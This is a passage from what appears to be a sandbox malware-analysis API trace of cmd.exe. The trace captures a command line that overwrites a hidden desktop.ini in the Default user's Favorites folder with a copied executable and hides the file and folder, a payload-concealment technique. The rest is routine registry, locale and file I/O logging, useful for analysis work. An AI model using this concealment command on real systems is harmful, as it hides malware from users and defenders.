lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x0, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.713] RegCloseKey (hKey=0x40) returned 0x0 [0212.713] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee98c | out: phkResult=0x2ee98c*=0x40) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x40, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x1000) 
returned 0x2 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x0, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x9, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x9, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.714] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x9, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.714] RegCloseKey (hKey=0x40) returned 0x0 [0212.714] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ae [0212.714] srand (_Seed=0x5b8863ae) [0212.714] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" [0212.714] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h 
\"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" [0212.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.714] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x451c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0212.714] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.714] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.715] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.715] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0212.715] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0212.715] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0212.715] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0212.715] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0212.715] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0212.715] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0212.715] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0212.715] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0212.715] GetEnvironmentStringsW () returned 0x4525f0* [0212.717] FreeEnvironmentStringsW (penv=0x4525f0) returned 1 [0212.717] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.717] GetEnvironmentVariableW (in: lpName="KEYS", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.717] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.717] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.717] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.717] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.717] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.717] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.717] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.717] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef758 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.717] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef758, lpFilePart=0x2ef754 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef754*="Desktop") returned 0x18 [0212.717] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.717] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4d4 | out: lpFindFileData=0x2ef4d4) returned 0x450c80 [0212.717] FindClose (in: hFindFile=0x450c80 | out: hFindFile=0x450c80) returned 1 [0212.717] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4d4 | out: lpFindFileData=0x2ef4d4) returned 0x450c80 [0212.717] FindClose (in: hFindFile=0x450c80 | out: hFindFile=0x450c80) returned 1 [0212.718] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4d4 | out: lpFindFileData=0x2ef4d4) returned 0x450c80 [0212.718] FindClose (in: hFindFile=0x450c80 | out: hFindFile=0x450c80) returned 1 [0212.718] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.718] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" 
(normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0212.718] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0212.718] GetEnvironmentStringsW () returned 0x4504a0* [0212.718] FreeEnvironmentStringsW (penv=0x4504a0) returned 1 [0212.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.718] GetConsoleOutputCP () returned 0x1b5 [0212.719] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.719] GetUserDefaultLCID () returned 0x409 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef898, cchData=128 | out: lpLCData="0") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef898, cchData=128 | out: lpLCData="0") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef898, cchData=128 | out: lpLCData="1") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0212.719] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0212.719] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0212.719] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.720] GetConsoleTitleW (in: lpConsoleTitle=0x440ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.720] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0212.720] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0212.720] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0212.721] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0212.721] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0212.721] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0212.721] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0212.721] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0212.721] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0212.721] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0212.726] _wcsicmp (_String1="del", _String2=")") returned 59 [0212.726] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0212.726] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0212.726] _wcsicmp (_String1="IF", _String2="del") returned 5 [0212.726] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0212.726] _wcsicmp (_String1="REM", _String2="del") returned 14 [0212.726] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0212.728] _wcsicmp (_String1="type", _String2=")") returned 75 [0212.728] _wcsicmp (_String1="FOR", _String2="type") returned -14 
[0212.728] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0212.728] _wcsicmp (_String1="IF", _String2="type") returned -11 [0212.728] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0212.728] _wcsicmp (_String1="REM", _String2="type") returned -2 [0212.728] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0212.735] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.735] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.740] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.740] FindClose (in: hFindFile=0x452530 | out: hFindFile=0x452530) returned 1 [0212.741] FindClose (in: hFindFile=0x452530 | out: hFindFile=0x452530) returned 1 [0212.741] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.741] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.741] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.741] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef148, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef210 | out: lpAttributeList=0x2ef148, lpSize=0x2ef210) returned 1 [0212.741] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef148, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef208, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef148, lpPreviousValue=0x0) returned 1 [0212.741] GetStartupInfoW (in: lpStartupInfo=0x2ef104 | out: lpStartupInfo=0x2ef104*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0212.741] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.742] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef1a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1f0 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessInformation=0x2ef1f0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa7c, dwThreadId=0xab0)) returned 1 [0212.744] CloseHandle (hObject=0x4c) returned 1 [0212.744] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.744] GetEnvironmentStringsW () returned 0x4509d0* [0212.744] FreeEnvironmentStringsW (penv=0x4509d0) returned 1 [0212.744] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0212.780] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef0e4 | out: lpExitCode=0x2ef0e4*=0x0) returned 1 [0212.780] CloseHandle (hObject=0x50) returned 1 [0212.780] _vsnwprintf (in: _Buffer=0x2ef22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0f0 | out: _Buffer="00000000") returned 8 [0212.780] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0212.780] GetEnvironmentStringsW () returned 0x452580* [0212.780] FreeEnvironmentStringsW (penv=0x452580) returned 1 [0212.780] SetEnvironmentVariableW 
(lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.780] GetEnvironmentStringsW () returned 0x452580* [0212.780] FreeEnvironmentStringsW (penv=0x452580) returned 1 [0212.780] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef148 | out: lpAttributeList=0x2ef148) [0212.780] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.781] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\micros~1\\desktop.ini")) returned 0xffffffff [0212.781] GetLastError () returned 0x2 [0212.781] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1" (normalized: "c:\\users\\default\\favori~1\\micros~1")) returned 0x10 [0212.781] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0212.781] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0212.781] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\micros~1\\desktop.ini")) returned 0xffffffff [0212.781] GetLastError () returned 0x2 [0212.781] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2eef74 | out: lpConsoleScreenBufferInfo=0x2eef74) returned 1 [0212.782] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0212.783] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0212.783] GetConsoleTitleW (in: lpConsoleTitle=0x2ef464, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.784] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0212.784] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.785] GetFileType (hFile=0x50) returned 0x1 [0212.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.785] GetFileType (hFile=0x50) returned 0x1 [0212.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.785] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 
0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] GetFileType (hFile=0x50) returned 0x1 [0212.786] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.786] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.787] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.787] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) 
returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] GetFileType (hFile=0x50) returned 0x1 [0212.787] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.787] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.788] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.788] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] GetFileType (hFile=0x50) returned 0x1 [0212.788] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.788] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, 